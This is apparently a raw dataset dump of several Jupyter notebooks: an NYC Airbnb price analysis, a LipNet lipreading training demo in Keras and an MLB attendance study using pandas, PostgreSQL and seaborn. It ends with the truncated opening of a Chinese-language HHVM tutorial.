"This plot indicates the overall price distribution. The plot indicates the majority of the record is above the average price.",
"_____no_output_____"
]
],
[
[
"plt.figure(figsize = (9, 6))\nplt.plot(data.groupby(['neighbourhood_group'])['price'].mean().keys(),data.groupby(['neighbourhood_group'])['price'].mean().values,'o')\nplt.title('Newyork City Average Airbnb price per region')\nplt.ylabel('Price')\nplt.xlabel('Neighbourhood group')\ncolor = ['DarkBlue']\nplt.show()\n",
"_____no_output_____"
]
],
[
[
"As we see that the average price in Manhattan is higher than in other regions. Manhattan is the most populated of Newyork City. it is among the world's major commerical, financial and cultural ceters. because of this the area has high tourists. ",
"_____no_output_____"
]
],
[
[
"#boxplot neighbourhood_group and room availability\nsns.set(style='whitegrid', rc={\"grid.linewidth\": 0.1})\nsns.set_context(\"paper\", font_scale=0.9) \nplt.figure(figsize=(10,10)) \nplt.tight_layout() \n \nsns.despine(left=True, bottom=True) \nplt.savefig('test.pdf', bbox_inches='tight') \ndf1 = sns.boxplot(data=data, x='neighbourhood_group',y='availability_365',palette='inferno')\n\n",
"_____no_output_____"
]
],
[
[
"Availability of one the key aprameter for this business and for anyother business. As the plot indicates there is a no enough supply for all neighborhood group for 365 days. ",
"_____no_output_____"
],
[
"### Neighbourhood gorup colored by price",
"_____no_output_____"
]
],
[
[
"# reference: https://plot.ly/python/line-and-scatter/\nregions_dict = {value: i for i,value in enumerate(data.neighbourhood_group.unique())}\nreverse_regions_dict = {i:v for v,i in regions_dict.items()}\ndata = data.applymap(lambda s: regions_dict.get(s) if s in regions_dict.keys() else s)",
"_____no_output_____"
],
[
"# reference: https://plot.ly/python/line-and-scatter/\nplt.figure(figsize=(12, 5))\nplt.scatter(data.latitude,data.longitude, c = data.neighbourhood_group,cmap='magma')\nplt.title('New York city map colored by neighboorhoud_group')\n#plt.legend()\nplt.show()",
"_____no_output_____"
]
],
[
[
"This graph is inlustrates another quantitative variables(longitude and latitude) with neighborhood group. ",
"_____no_output_____"
]
],
[
[
"\nfor i,region in enumerate(data.groupby(['neighbourhood_group'])['price'].mean().keys()):\n NY_data = data[data.neighbourhood_group == region]\n plt.figure(figsize=(8, 5))\n # xxx, sub = plt.subplots(1, 2)\n plt.scatter(NY_data.latitude, NY_data.longitude, c = NY_data.price,cmap='PuBuGn')\n plt.title('{} Prices'.format(reverse_regions_dict[region]))\n plt.colorbar()\n plt.show()",
"_____no_output_____"
]
],
[
[
"When we look at the amount of owners per region, it is interesting to notice that in the regions where the rent price is\nhigher, the number of owners is also higher. That is probably due to the fact that as the apartments cost more in such regions\nis harder to find owners of two or more houses there.",
"_____no_output_____"
]
],
[
[
"sns.heatmap(data[['latitude','longitude','price','minimum_nights','availability_365','number_of_reviews']].corr(),annot=True)\nplt.show()",
"_____no_output_____"
]
],
[
[
"As seen in the correlation matrix, homes that are more available tend to have more reviews, which is natural,\nsince as the place is avaliable more days in a year more people can rent it.",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
]
] |
cb02ce6a43a4a02f62355d63896ea8d75d928378 | 55,116 | ipynb | Jupyter Notebook | lipreading/Lipreading_Training_Demo_[Cleaner].ipynb | elekhtron/MathResearchQHSS | b680fc1995b03b55fa360e3ca7f83bfcf237503d | [
"MIT"
] | null | null | null | lipreading/Lipreading_Training_Demo_[Cleaner].ipynb | elekhtron/MathResearchQHSS | b680fc1995b03b55fa360e3ca7f83bfcf237503d | [
"MIT"
] | null | null | null | lipreading/Lipreading_Training_Demo_[Cleaner].ipynb | elekhtron/MathResearchQHSS | b680fc1995b03b55fa360e3ca7f83bfcf237503d | [
"MIT"
] | null | null | null | 69.067669 | 2,917 | 0.59988 | [
[
[
"<a href=\"https://colab.research.google.com/github/jchen42703/MathResearchQHSS/blob/lipreading-temp/lipreading/Lipreading_Training_Demo_[Cleaner].ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>",
"_____no_output_____"
]
],
[
[
"!apt install ffmpeg",
"Reading package lists... Done\nBuilding dependency tree \nReading state information... Done\nffmpeg is already the newest version (7:3.4.4-0ubuntu0.18.04.1).\n0 upgraded, 0 newly installed, 0 to remove and 8 not upgraded.\n"
],
[
"! pip install ffmpeg sk-video",
"Requirement already satisfied: ffmpeg in /usr/local/lib/python3.6/dist-packages (1.4)\nRequirement already satisfied: sk-video in /usr/local/lib/python3.6/dist-packages (1.1.10)\nRequirement already satisfied: scipy in /usr/local/lib/python3.6/dist-packages (from sk-video) (1.1.0)\nRequirement already satisfied: numpy in /usr/local/lib/python3.6/dist-packages (from sk-video) (1.14.6)\n"
]
],
[
[
"# IO\n* Uploading data through google drive; ask [email protected] or [email protected] to share it with you. ",
"_____no_output_____"
]
],
[
[
"import os\n!mkdir s1\n!mkdir s1_align\nos.listdir()\n\n!pip install -U -q PyDrive\n\ns1_folder_id = '1B8cIYz6ljEbjYapG6EW1NrKHgcpZ2HzD'\ns1_align_folder_id = '1swcuyFY-ZdNgFBou5GiigfEXsURcPO63'\n\nfrom pydrive.auth import GoogleAuth\nfrom pydrive.drive import GoogleDrive\nfrom google.colab import auth\nfrom oauth2client.client import GoogleCredentials\n# 1. Authenticate and create the PyDrive client.\nauth.authenticate_user()\ngauth = GoogleAuth()\ngauth.credentials = GoogleCredentials.get_application_default()\ndrive = GoogleDrive(gauth)",
"mkdir: cannot create directory ‘s1’: File exists\nmkdir: cannot create directory ‘s1_align’: File exists\n"
],
[
"# uploading all of speaker 1's .mpg files.\n%cd '/content/s1'\n!pwd\n\nfile_list = drive.ListFile({'q': \"'{}' in parents and trashed=false\".format(s1_folder_id)}).GetList()\n\nfor file1 in sorted(file_list, key = lambda x: x['title']):\n print('Downloading {} from GDrive'.format(file1['title'])) # i+1, len(file_list)))\n file1.GetContentFile(file1['title'])",
"_____no_output_____"
],
[
"# uploading all of the corresponding align files (labels)\ncd '/content/s1_align'\n!pwd\n\nfile_list = drive.ListFile({'q': \"'{}' in parents and trashed=false\".format(s1_align_folder_id)}).GetList()\n\nfor file1 in sorted(file_list, key = lambda x: x['title']):\n print('Downloading {} from GDrive'.format(file1['title'])) # i+1, len(file_list)))\n file1.GetContentFile(file1['title'])",
"_____no_output_____"
],
[
"# check directories\n%cd '/content/'\n# os.listdir('/content'), os.listdir('/content/training'), os.listdir('/content/labels')",
"/content\n"
]
],
[
[
"## Model + IO\n",
"_____no_output_____"
]
],
[
[
"! rm -r MathResearchQHSS\n! git clone -b lipreading https://github.com/jchen42703/MathResearchQHSS.git",
"Cloning into 'MathResearchQHSS'...\nremote: Enumerating objects: 56, done.\u001b[K\nremote: Counting objects: 1% (1/56) \u001b[K\rremote: Counting objects: 3% (2/56) \u001b[K\rremote: Counting objects: 5% (3/56) \u001b[K\rremote: Counting objects: 7% (4/56) \u001b[K\rremote: Counting objects: 8% (5/56) \u001b[K\rremote: Counting objects: 10% (6/56) \u001b[K\rremote: Counting objects: 12% (7/56) \u001b[K\rremote: Counting objects: 14% (8/56) \u001b[K\rremote: Counting objects: 16% (9/56) \u001b[K\rremote: Counting objects: 17% (10/56) \u001b[K\rremote: Counting objects: 19% (11/56) \u001b[K\rremote: Counting objects: 21% (12/56) \u001b[K\rremote: Counting objects: 23% (13/56) \u001b[K\rremote: Counting objects: 25% (14/56) \u001b[K\rremote: Counting objects: 26% (15/56) \u001b[K\rremote: Counting objects: 28% (16/56) \u001b[K\rremote: Counting objects: 30% (17/56) \u001b[K\rremote: Counting objects: 32% (18/56) \u001b[K\rremote: Counting objects: 33% (19/56) \u001b[K\rremote: Counting objects: 35% (20/56) \u001b[K\rremote: Counting objects: 37% (21/56) \u001b[K\rremote: Counting objects: 39% (22/56) \u001b[K\rremote: Counting objects: 41% (23/56) \u001b[K\rremote: Counting objects: 42% (24/56) \u001b[K\rremote: Counting objects: 44% (25/56) \u001b[K\rremote: Counting objects: 46% (26/56) \u001b[K\rremote: Counting objects: 48% (27/56) \u001b[K\rremote: Counting objects: 50% (28/56) \u001b[K\rremote: Counting objects: 51% (29/56) \u001b[K\rremote: Counting objects: 53% (30/56) \u001b[K\rremote: Counting objects: 55% (31/56) \u001b[K\rremote: Counting objects: 57% (32/56) \u001b[K\rremote: Counting objects: 58% (33/56) \u001b[K\rremote: Counting objects: 60% (34/56) \u001b[K\rremote: Counting objects: 62% (35/56) \u001b[K\rremote: Counting objects: 64% (36/56) \u001b[K\rremote: Counting objects: 66% (37/56) \u001b[K\rremote: Counting objects: 67% (38/56) \u001b[K\rremote: Counting objects: 69% (39/56) \u001b[K\rremote: Counting objects: 71% (40/56) \u001b[K\rremote: Counting objects: 73% (41/56) \u001b[K\rremote: Counting objects: 75% (42/56) \u001b[K\rremote: Counting objects: 76% (43/56) \u001b[K\rremote: Counting objects: 78% (44/56) \u001b[K\rremote: Counting objects: 80% (45/56) \u001b[K\rremote: Counting objects: 82% (46/56) \u001b[K\rremote: Counting objects: 83% (47/56) \u001b[K\rremote: Counting objects: 85% (48/56) \u001b[K\rremote: Counting objects: 87% (49/56) \u001b[K\rremote: Counting objects: 89% (50/56) \u001b[K\rremote: Counting objects: 91% (51/56) \u001b[K\rremote: Counting objects: 92% (52/56) \u001b[K\rremote: Counting objects: 94% (53/56) \u001b[K\rremote: Counting objects: 96% (54/56) \u001b[K\rremote: Counting objects: 98% (55/56) \u001b[K\rremote: Counting objects: 100% (56/56) \u001b[K\rremote: Counting objects: 100% (56/56), done.\u001b[K\nremote: Compressing objects: 100% (56/56), done.\u001b[K\nremote: Total 362 (delta 39), reused 0 (delta 0), pack-reused 306\u001b[K\nReceiving objects: 100% (362/362), 21.20 MiB | 8.43 MiB/s, done.\nResolving deltas: 100% (187/187), done.\n"
],
[
"%cd MathResearchQHSS\n!pip install -r requirements.txt\n%cd '/content/'",
"/content/MathResearchQHSS\nRequirement already satisfied: pandas>=0.23.0 in /usr/local/lib/python3.6/dist-packages (from -r requirements.txt (line 1)) (0.23.4)\nRequirement already satisfied: seaborn>=0.9.0 in /usr/local/lib/python3.6/dist-packages (from -r requirements.txt (line 2)) (0.9.0)\nRequirement already satisfied: quandl in /usr/local/lib/python3.6/dist-packages (from -r requirements.txt (line 3)) (3.4.5)\nRequirement already satisfied: numpy in /usr/local/lib/python3.6/dist-packages (from -r requirements.txt (line 4)) (1.14.6)\nRequirement already satisfied: scipy in /usr/local/lib/python3.6/dist-packages (from -r requirements.txt (line 5)) (1.1.0)\nRequirement already satisfied: python-dateutil>=2.5.0 in /usr/local/lib/python3.6/dist-packages (from pandas>=0.23.0->-r requirements.txt (line 1)) (2.5.3)\nRequirement already satisfied: pytz>=2011k in /usr/local/lib/python3.6/dist-packages (from pandas>=0.23.0->-r requirements.txt (line 1)) (2018.7)\nRequirement already satisfied: matplotlib>=1.4.3 in /usr/local/lib/python3.6/dist-packages (from seaborn>=0.9.0->-r requirements.txt (line 2)) (2.1.2)\nRequirement already satisfied: more-itertools in /usr/local/lib/python3.6/dist-packages (from quandl->-r requirements.txt (line 3)) (4.3.0)\nRequirement already satisfied: requests>=2.7.0 in /usr/local/lib/python3.6/dist-packages (from quandl->-r requirements.txt (line 3)) (2.18.4)\nRequirement already satisfied: inflection>=0.3.1 in /usr/local/lib/python3.6/dist-packages (from quandl->-r requirements.txt (line 3)) (0.3.1)\nRequirement already satisfied: six in /usr/local/lib/python3.6/dist-packages (from quandl->-r requirements.txt (line 3)) (1.11.0)\nRequirement already satisfied: pyparsing!=2.0.4,!=2.1.2,!=2.1.6,>=2.0.1 in /usr/local/lib/python3.6/dist-packages (from matplotlib>=1.4.3->seaborn>=0.9.0->-r requirements.txt (line 2)) (2.3.0)\nRequirement already satisfied: cycler>=0.10 in /usr/local/lib/python3.6/dist-packages (from matplotlib>=1.4.3->seaborn>=0.9.0->-r requirements.txt (line 2)) (0.10.0)\nRequirement already satisfied: chardet<3.1.0,>=3.0.2 in /usr/local/lib/python3.6/dist-packages (from requests>=2.7.0->quandl->-r requirements.txt (line 3)) (3.0.4)\nRequirement already satisfied: urllib3<1.23,>=1.21.1 in /usr/local/lib/python3.6/dist-packages (from requests>=2.7.0->quandl->-r requirements.txt (line 3)) (1.22)\nRequirement already satisfied: idna<2.7,>=2.5 in /usr/local/lib/python3.6/dist-packages (from requests>=2.7.0->quandl->-r requirements.txt (line 3)) (2.6)\nRequirement already satisfied: certifi>=2017.4.17 in /usr/local/lib/python3.6/dist-packages (from requests>=2.7.0->quandl->-r requirements.txt (line 3)) (2018.11.29)\n/content\n"
],
[
"from MathResearchQHSS.lipreading.io.generator import FrameGenerator\nfrom MathResearchQHSS.lipreading.models import LipNet\nfrom MathResearchQHSS.lipreading.io.io_utils import get_list_IDs\nimport os\nfrom glob import glob\nimport skvideo\n\nold = (75, 576, 720, 3)\nnew = (75, 192, 240,3)\n\ns1_path = '/content/s1/'\ns1_align_path = '/content/s1_align/'\n\n# initializing generators \nlist_IDs = get_list_IDs(s1_path, val_split = 0.8)\ndata_dirs = [s1_path, s1_align_path]\ntrain_gen = FrameGenerator(list_IDs['train'], data_dirs, batch_size = 1, resize_shape = new )\nval_gen = FrameGenerator(list_IDs['val'], data_dirs, batch_size = 1, resize_shape = new)\n# gen.__getitem__(1)",
"_____no_output_____"
],
[
"# quick testing of generators\ninp, out = train_gen.__getitem__(1)\ninp['the_input'].shape",
"/usr/local/lib/python3.6/dist-packages/skimage/transform/_warps.py:84: UserWarning: The default mode, 'constant', will be changed to 'reflect' in skimage 0.15.\n warn(\"The default mode, 'constant', will be changed to 'reflect' in \"\n"
],
[
"# initializing model (takes a while)\nlipnet = LipNet(img_w = new[1], img_h = new[2])\nlipnet.summary()",
"_________________________________________________________________\nLayer (type) Output Shape Param # \n=================================================================\nthe_input (InputLayer) (None, 75, 192, 240, 3) 0 \n_________________________________________________________________\nzero1 (ZeroPadding3D) (None, 77, 196, 244, 3) 0 \n_________________________________________________________________\nconv1 (Conv3D) (None, 75, 96, 120, 32) 7232 \n_________________________________________________________________\nmax1 (MaxPooling3D) (None, 75, 48, 60, 32) 0 \n_________________________________________________________________\ndropout_4 (Dropout) (None, 75, 48, 60, 32) 0 \n_________________________________________________________________\nzero2 (ZeroPadding3D) (None, 77, 52, 64, 32) 0 \n_________________________________________________________________\nconv2 (Conv3D) (None, 75, 48, 60, 64) 153664 \n_________________________________________________________________\nmax2 (MaxPooling3D) (None, 75, 24, 30, 64) 0 \n_________________________________________________________________\ndropout_5 (Dropout) (None, 75, 24, 30, 64) 0 \n_________________________________________________________________\nzero3 (ZeroPadding3D) (None, 77, 26, 32, 64) 0 \n_________________________________________________________________\nconv3 (Conv3D) (None, 75, 24, 30, 96) 165984 \n_________________________________________________________________\nmax3 (MaxPooling3D) (None, 75, 12, 15, 96) 0 \n_________________________________________________________________\ndropout_6 (Dropout) (None, 75, 12, 15, 96) 0 \n_________________________________________________________________\ntime_distributed_2 (TimeDist (None, 75, 17280) 0 \n_________________________________________________________________\nbidirectional_3 (Bidirection (None, 75, 512) 26936832 \n_________________________________________________________________\nbidirectional_4 (Bidirection (None, 75, 512) 1181184 \n_________________________________________________________________\ndense1 (Dense) (None, 75, 28) 14364 \n_________________________________________________________________\nsoftmax (Activation) (None, 75, 28) 0 \n=================================================================\nTotal params: 28,459,260\nTrainable params: 28,459,260\nNon-trainable params: 0\n_________________________________________________________________\n"
],
[
"# compiles model\nfrom keras.optimizers import Adam\nadam = Adam(lr=3e-4, beta_1=0.9, beta_2=0.999, epsilon=1e-08)\n\n# the loss calc occurs elsewhere, so use a dummy lambda func for the loss\nlipnet.model.compile(loss={'ctc': lambda y_true, y_pred: y_pred}, optimizer=adam)",
"_____no_output_____"
],
[
"# training \nn_epochs = 20\nmax_queue_size = 1\nlipnet.model.fit_generator(generator = train_gen, epochs = n_epochs, max_queue_size = max_queue_size, workers = 2, use_multiprocessing = True)",
"Epoch 1/200\n"
],
[
"model.save_weights('train_weights_'+str(n_epochs)+'.h5')",
"_____no_output_____"
],
[
"# Adding CLR\n! git clone https://github.com/jchen42703/CLR.git",
"Cloning into 'CLR'...\nremote: Enumerating objects: 247, done.\u001b[K\nremote: Total 247 (delta 0), reused 0 (delta 0), pack-reused 247\u001b[K\nReceiving objects: 100% (247/247), 1.37 MiB | 1.29 MiB/s, done.\nResolving deltas: 100% (86/86), done.\n"
],
[
"# initializing the cyclical learning rate callback\nfrom CLR import clr_callback\nclr = clr_callback.CyclicLR(base_lr=1e-5, max_lr=3e-3, \n step_size=1000., # originally 1000\n mode = 'triangular')\n #mode='exp_range', gamma=0.99994)\ncallbacks = [clr]",
"_____no_output_____"
],
[
"# training \nn_epochs = 20\nmax_queue_size = 1\nlipnet.model.fit_generator(generator = train_gen, epochs = n_epochs, callbacks = callbacks, max_queue_size = max_queue_size, workers = 2, use_multiprocessing = True)",
"Epoch 1/200\n"
],
[
"",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb02f4600256a50d59c64818ee6c35e9f3dd7bcb | 351,509 | ipynb | Jupyter Notebook | What-Drives-MLB Game-Attendance.ipynb | bigbluey/What-Drives-MLB-Game-Attendance | 0b8b17bab213b9571e3728a6022b41cc352312f0 | [
"MIT"
] | null | null | null | What-Drives-MLB Game-Attendance.ipynb | bigbluey/What-Drives-MLB-Game-Attendance | 0b8b17bab213b9571e3728a6022b41cc352312f0 | [
"MIT"
] | null | null | null | What-Drives-MLB Game-Attendance.ipynb | bigbluey/What-Drives-MLB-Game-Attendance | 0b8b17bab213b9571e3728a6022b41cc352312f0 | [
"MIT"
] | null | null | null | 331.299717 | 51,924 | 0.916204 | [
[
[
"# What Drives MLB Game Attendance?",
"_____no_output_____"
],
[
"## Background\n### Find Data\n* Step 1 - Identify and Source Data\n* Step 2 - Perform ETL on the Data:\n * Extract: original data sources and how the data was formatted (CSV, JSON, MySQL, etc).\n * Transform: what data cleaning or transformation was required.\n * Load: the final database, tables/collections, and why this was chosen.\n\n### Data Cleanup & Analysis\n* Document the following:\n * The sources of data that you will extract from.\n * The type of transformation needed for this data (cleaning, joining, filtering, aggregating, etc).\n * The type of final production database to load the data into (relational or non-relational).\n * The final tables or collections that will be used in the production database.\n\n\n## Objectives\n* Variable Set 1 - Game Attendance & Experience 2013 - 2016:\n * Major League Baseball Attendance by Team/Stadium\n * Major League Baseball Beer Prices by Team/Stadium\n\n\n* Variable Set II - Team & Players 2013 - 2016:\n * Major League Baseball Team Offensive Output (Homeruns & RBI's)\n * Major League Baseball Average Player Salary by Team",
"_____no_output_____"
]
],
[
[
"# Import Dependencies\nimport pandas as pd\nimport numpy as np\nimport matplotlib\n%matplotlib inline\nfrom matplotlib import style\nstyle.use('fivethirtyeight')\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n# Python SQL Toolkit and Object Relational Mapper\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, inspect, func\nfrom sqlalchemy.ext.declarative import declarative_base",
"_____no_output_____"
]
],
[
[
"### Store CSV into DataFrame",
"_____no_output_____"
]
],
[
[
"# Files to Load \nbaseball_data_to_load = \"./Resources/baseballdata.csv\"\nmlb_team_data_to_load = \"./Resources/mlb_teams.csv\"\nmlb_beer_price_to_load = \"./Resources/mlb_beer_prices.csv\"\n\n# Read All CSV's\nbaseball_data = pd.read_csv(baseball_data_to_load)\nmlb_team_data = pd.read_csv(mlb_team_data_to_load)\nmlb_beer_price = pd.read_csv(mlb_beer_price_to_load)\n\n# Combine/Merge the DataFrames Into a Single Dataset Based on the Team Names They Share & Year\nmlb_df = pd.merge(baseball_data, mlb_team_data, left_on=[\"Team Name\", \"Year\"], right_on=[\"Team Name\",\"Year\"])\n\n# Display Data Table for Preview\nmlb_df.head()",
"_____no_output_____"
],
[
"# Combine/Merge the 3rd DataFrame With Previously Merged DataFrame \n# Into a Single Dataset Based on the Team Names They Share & Year\ncombined_mlb_df = pd.merge(mlb_beer_price, mlb_df, left_on=[\"Team Name\", \"Year\"], right_on=[\"Team Name\",\"Year\"])\n\n# Display Data Table for Preview\ncombined_mlb_df.head()",
"_____no_output_____"
]
],
[
[
"### Create New Data with Select Columns",
"_____no_output_____"
]
],
[
[
"# Clean DataFrame & Get Only the Data Needed\nnew_combined_mlb_df = combined_mlb_df[[\"Team Name\", \"Year\", \"HR\", \"RBI\", \"salary\", \"PPO\", \"Attendance\"]].copy()\nnew_combined_mlb_df.head()",
"_____no_output_____"
],
[
"# Convert Attendance From String to a Float\nnew_combined_mlb_df.iloc[:,6] = new_combined_mlb_df.iloc[:,6].str.replace(',', '').astype(float)\nnew_combined_mlb_df.head()",
"_____no_output_____"
],
[
"# Import Pandas DataFrame to PostgreSQL\nengine = create_engine(\"postgresql://postgres:password@localhost:5432/baseball_df\")\nupdated_mlb_df.to_sql(\"baseball_df\", engine)",
"_____no_output_____"
],
[
"# Create Engine and Pass in Postgres Connection\n# Setup to Connect to Database \nengine = create_engine(\"postgres://postgres:password@localhost:5432/baseball_df\")\nconn = engine.connect()",
"/Users/josephyon/anaconda3/lib/python3.7/site-packages/psycopg2/__init__.py:144: UserWarning: The psycopg2 wheel package will be renamed from release 2.8; in order to keep installing from binary please use \"pip install psycopg2-binary\" instead. For details see: <http://initd.org/psycopg/docs/install.html#binary-install-from-pypi>.\n \"\"\")\n"
],
[
"# Calculate Average Team Attendance From 2013-2016\nattendance_2013 = engine.execute('SELECT \"Team Name\",\"Attendance\" FROM baseball_df WHERE \"Year\"=2013').fetchall()\nattendance_2014 = engine.execute('SELECT \"Team Name\",\"Attendance\" FROM baseball_df WHERE \"Year\"=2014').fetchall()\nattendance_2015 = engine.execute('SELECT \"Team Name\",\"Attendance\" FROM baseball_df WHERE \"Year\"=2015').fetchall()\nattendance_2016 = engine.execute('SELECT \"Team Name\",\"Attendance\" FROM baseball_df WHERE \"Year\"=2016').fetchall()",
"_____no_output_____"
],
[
"# Calculate Average Team Attendance vs. Average Beer Price per Ounce (PPO) for 4 Years\nbeer = pd.read_sql('SELECT \"Team Name\", AVG(\"Attendance\") AS \"Attendance\", AVG(\"PPO\") AS \"PPO\" FROM baseball_df GROUP BY \"Team Name\"', conn)",
"_____no_output_____"
],
[
"# Calculate Average Team Attendance vs. Average HR's + Average RBI's AS Offensive Output for 4 Years\noffense = pd.read_sql('SELECT \"Team Name\", AVG(\"Attendance\") AS \"Attendance\", AVG(\"HR\" + \"RBI\") AS \"Offensive Output\" FROM baseball_df GROUP BY \"Team Name\"', conn)",
"_____no_output_____"
],
[
"# Calculate Average Team Attendance vs. Average Team Salary for 4 Years\nsalary = pd.read_sql('SELECT \"Team Name\", AVG(\"Attendance\") AS \"Attendance\", AVG(\"salary\") AS \"Salary\" FROM baseball_df GROUP BY \"Team Name\"', conn)",
"_____no_output_____"
]
],
[
[
"### Visualizations with Matplotlib",
"_____no_output_____"
]
],
[
[
"# Plot 2013 Attendance Results in a Matplotlib Bar Chart\ndf_2013 = pd.DataFrame(attendance_2013, columns=[\"Team Name\",\"Attendance\"])\ndf_2013.set_index(\"Team Name\", inplace=True)\ndf_2013.plot.bar(title=\"2013 MLB Team Attendance\", figsize=(12,8))\nplt.savefig(\"./Images/2013_MLB_Team_Attendance.png\")\nplt.show()",
"_____no_output_____"
],
[
"# Plot 2014 Attendance Results in a Matplotlib Bar Chart\ndf_2014 = pd.DataFrame(attendance_2014, columns=[\"Team Name\",\"Attendance\"])\ndf_2014.set_index(\"Team Name\", inplace=True)\ndf_2014.plot.bar(title=\"2014 MLB Team Attendance\", figsize=(12,8))\nplt.savefig(\"./Images/2014_MLB_Team_Attendance.png\")\nplt.show()",
"_____no_output_____"
],
[
"# Plot 2015 Attendance Results in a Matplotlib Bar Chart\ndf_2015 = pd.DataFrame(attendance_2015, columns=[\"Team Name\",\"Attendance\"])\ndf_2015.set_index(\"Team Name\", inplace=True)\ndf_2015.plot.bar(title=\"2015 MLB Team Attendance\", figsize=(12,8))\nplt.savefig(\"./Images/2015_MLB_Team_Attendance.png\")\nplt.show()",
"_____no_output_____"
],
[
"# Plot 2016 Attendance Results in a Matplotlib Bar Chart\ndf_2016 = pd.DataFrame(attendance_2016, columns=[\"Team Name\",\"Attendance\"])\ndf_2016.set_index(\"Team Name\", inplace=True)\ndf_2016.plot.bar(title=\"2016 MLB Team Attendance\", figsize=(12,8))\nplt.savefig(\"./Images/2016_MLB_Team_Attendance.png\")\nplt.show()",
"_____no_output_____"
],
[
"# Create Scatterplot with Regression Showing Average Beer Price per Ounce (PPO) vs. Attendance for 4 years\nfig, ax = plt.subplots()\nfig.set_size_inches(12, 8)\nsns.regplot(x=\"PPO\", y=\"Attendance\", data=beer, ax=ax).set_title(\"Attendance vs. Beer Price (2013-2016)\")\nplt.savefig(\"./Images/Attendance_vs_Beer_Price.png\")",
"/Users/josephyon/anaconda3/lib/python3.7/site-packages/scipy/stats/stats.py:1713: FutureWarning: Using a non-tuple sequence for multidimensional indexing is deprecated; use `arr[tuple(seq)]` instead of `arr[seq]`. In the future this will be interpreted as an array index, `arr[np.array(seq)]`, which will result either in an error or a different result.\n return np.add.reduce(sorted[indexer] * weights, axis=axis) / sumval\n"
],
[
"# Create Scatterplot with Regression Showing Average HR's + Average RBI's AS Offensive Output vs. Attendance for 4 Years\nfig, ax = plt.subplots()\nfig.set_size_inches(12, 8)\nsns.regplot(x=\"Offensive Output\", y=\"Attendance\", data=offense, ax=ax).set_title(\"Attendance vs. Offensive Output (2013-2016)\")\nplt.savefig(\"./Images/Attendance_vs_Offensive_Output.png\")\n",
"/Users/josephyon/anaconda3/lib/python3.7/site-packages/scipy/stats/stats.py:1713: FutureWarning: Using a non-tuple sequence for multidimensional indexing is deprecated; use `arr[tuple(seq)]` instead of `arr[seq]`. In the future this will be interpreted as an array index, `arr[np.array(seq)]`, which will result either in an error or a different result.\n return np.add.reduce(sorted[indexer] * weights, axis=axis) / sumval\n"
],
[
"# Create Scatterplot with Regression Showing Average Team Attendance vs. Average Team Salary for 4 Years\nfig, ax = plt.subplots()\nfig.set_size_inches(12, 8)\nsns.regplot(x=\"Salary\", y=\"Attendance\", data=salary, ax=ax).set_title(\"Attendance vs. Salary (2013-2016)\")\nplt.savefig(\"./Images/Attendance_vs_Salary.png\")",
"/Users/josephyon/anaconda3/lib/python3.7/site-packages/scipy/stats/stats.py:1713: FutureWarning: Using a non-tuple sequence for multidimensional indexing is deprecated; use `arr[tuple(seq)]` instead of `arr[seq]`. In the future this will be interpreted as an array index, `arr[np.array(seq)]`, which will result either in an error or a different result.\n return np.add.reduce(sorted[indexer] * weights, axis=axis) / sumval\n"
]
],
[
[
"### Observations\n* From 2013-2016, MLB team attendance improved for some teams and decreased for others. For example, the St. Louis Cardinals and the Toronto Blue Jays saw an increase in attendance from 2013-2016 while the Oakland A's and Tampa Bay Rays saw decreases. \n* It seems as if lower beer prices did not affect MLB attendance but offensive output, however, affected MLB attendance but only slightly. Beer prices might be lower but fans would rather see more offense.\n* The big correlation was between player salary and attendance. The \"Attendance vs. Salary\" scatterplot indicates that the more a team is willing to spend on players, most likely super stars and/or all-stars, the more willing fans are likely to attend games. ",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
]
] |
cb0305183cf6930c1e843295ae2c8a04b7c0810f | 82,416 | ipynb | Jupyter Notebook | hhvm_tutorial/index.ipynb | Johnnyxcy/learn-hacklang | 0b7de61c23c600a4be6f047b47f3b359f0dafeec | [
"MIT"
] | 1 | 2022-03-30T00:42:08.000Z | 2022-03-30T00:42:08.000Z | hhvm_tutorial/index.ipynb | Johnnyxcy/learn-hacklang | 0b7de61c23c600a4be6f047b47f3b359f0dafeec | [
"MIT"
] | null | null | null | hhvm_tutorial/index.ipynb | Johnnyxcy/learn-hacklang | 0b7de61c23c600a4be6f047b47f3b359f0dafeec | [
"MIT"
] | null | null | null | 102.763092 | 19,378 | 0.817754 | [
[
[
"# HHVM\n\n## 背景介绍\n\nHHVM 是 Facebook (现 Meta) 开发的高性能 PHP 虚拟机,宣称达到了官方解释器的 9x 性能\n\n### 为什么会有 HHVM\n\n#### 脚本语言\n",
"_____no_output_____"
],
[
